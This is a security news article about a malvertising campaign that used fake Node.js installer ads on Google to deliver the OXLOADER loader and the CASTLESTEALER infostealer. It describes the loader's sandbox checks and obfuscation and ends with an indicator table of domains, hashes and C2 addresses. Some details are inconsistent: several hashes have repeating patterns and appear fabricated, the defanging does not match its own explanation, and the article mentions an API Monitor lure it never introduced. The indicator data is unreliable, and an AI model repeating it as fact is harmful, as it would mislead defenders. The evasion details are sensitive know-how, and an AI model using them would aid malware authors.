Hackers Impersonate Node.js Installer in Google Ads to Deploy Infostealer Malware

Hackers are using fake Google Ads to push a brand-new malware loader that disguises itself as the popular Node.js installer.

The campaign has been actively targeting Windows users in the United States, silently dropping a dangerous infostealer onto their machines after just a single click on what appears to be a legitimate sponsored search result.

The attack takes advantage of something millions of people do every day, searching for software online and trusting the top results. In this case, threat actors set up a malicious landing page built to look like an official Node.js platform.

When a victim clicked the sponsored ad, they were quietly redirected through an intermediary domain to download a malicious Windows batch script hosted on a legitimate cloud file-sharing service, making it much harder for security tools to flag it.

Researchers at Elastic Security Labs identified this active campaign and confirmed it was targeting one of their own customers. 

Elastic Security Labs said in a report shared with Cyber Security News (CSN) that the loader, now tracked as OXLOADER, had not been publicly documented before and was operating with remarkably low detection rates across both static antivirus engines and automated sandbox environments.

The campaign ran through Google Ads and the malicious advertiser account was registered under a verified name linked to Ukraine.

The last time the ad appeared was April 23, 2026, and by May 14, 2026, Google had removed the advertiser and all associated campaigns entirely.

What makes this attack particularly concerning is how seamlessly the threat actor blended into trusted platforms to deliver their payload without raising alarms.

The final payload delivered through this chain is an infostealer called CASTLESTEALER, a .NET-based malware capable of harvesting sensitive data from infected systems.

Security teams should treat sponsored search results for developer tools with extra scrutiny, ensure endpoint behavioral detection is active rather than just set to monitor mode, and always verify software downloads directly against official vendor websites.

Hackers Impersonate Node.js Installer in Google Ads

The infection chain begins when a user searches for the Node.js installer and clicks a sponsored result. That click sends the victim to a fake landing page built to mimic the real Node.js environment.

From there, a redirect through an intermediary domain delivers a batch script hosted on Storj, a legitimate cloud storage service the threat actors deliberately abused to bypass reputation-based filtering.

The batch script goes a step further by displaying a convincing fake software installation wizard, giving the victim no reason to suspect anything is wrong.

Behind that interface, it is silently downloading the next-stage executable using PowerShell and triggering a Windows User Account Control prompt to gain elevated system access. The entire experience is designed to feel like a routine software install.

A second variant of OXLOADER was also discovered on May 13, 2026, this time masquerading as a Node.js installer binary rather than API Monitor, though the underlying loader mechanism was completely identical.

Researchers noted that the file retained the word “node” in its filename, likely to maintain the lure theme the campaign relied on throughout.

How OXLOADER Evades Detection

OXLOADER is built with evasion as a core feature. Before executing anything meaningful, it runs five separate checks to confirm it is not running inside a sandbox or virtual machine.

These include checking for at least three CPU cores, at least 3 GB of physical RAM, a display refresh rate above 20 Hz, and verifying the system is not located in a CIS region or configured for the Russian language.

The loader also uses sophisticated obfuscation techniques that break standard binary analysis tools, making reverse engineering slow and difficult.

It hides malicious code inside the Windows .reloc section, a space legitimate programs never use for executable instructions, and unpacks itself in memory using self-modifying decryption routines.

The final payload, CASTLESTEALER, is then delivered entirely in memory using an open-source shellcode generator called DonutLoader, leaving almost no trace on disk.

Indicators of Compromise (IoCs):-

Type	Indicator	Description
Domain	nodejs-preventive..info	Malvertising landing page
Domain	app..miloyannopoulos..com	Malvertising redirector
SHA-256	fdfc9780b3c67acac3ca1acfdc9a890dcfee2d5d58fbcef8eac3fc80aa1cf2b3	OXLOADER downloader and launcher (Bild0erSetup.bat)
SHA-256	de2b7c7a9e7c006e7ca990e77e7dff9b8b73aa9e9e24b98a7f88d3b3fff7c2b3	OXLOADER downloader and launcher (Bild0erSetup.bat variant)
SHA-256	ca99a9fd118f8a99a9bc99ca9bb9cdfc7cd3b3db9fbcd3fecd3fecd7fe9f0f6f	apimonitor-x64.exe (OXLOADER)
SHA-256	ce8f8dcb3ca9e9190fd7818f1e7ab87b9fc8f8e7fc88fee8fcc8f8e7fc88fee8	node-v20.7.0-x64.exe (OXLOADER)
SHA-256	9a67a98fdc9e8e6e7886e9c0e8c668b87c0b66e8f07c8e1f7e89f7c8ca7e8cc8	CASTLESTEALER
IPv4	52.78.2.74	CASTLESTEALER C2
IPv4	52.78.77.48	CASTLESTEALER C2

Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM.

Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.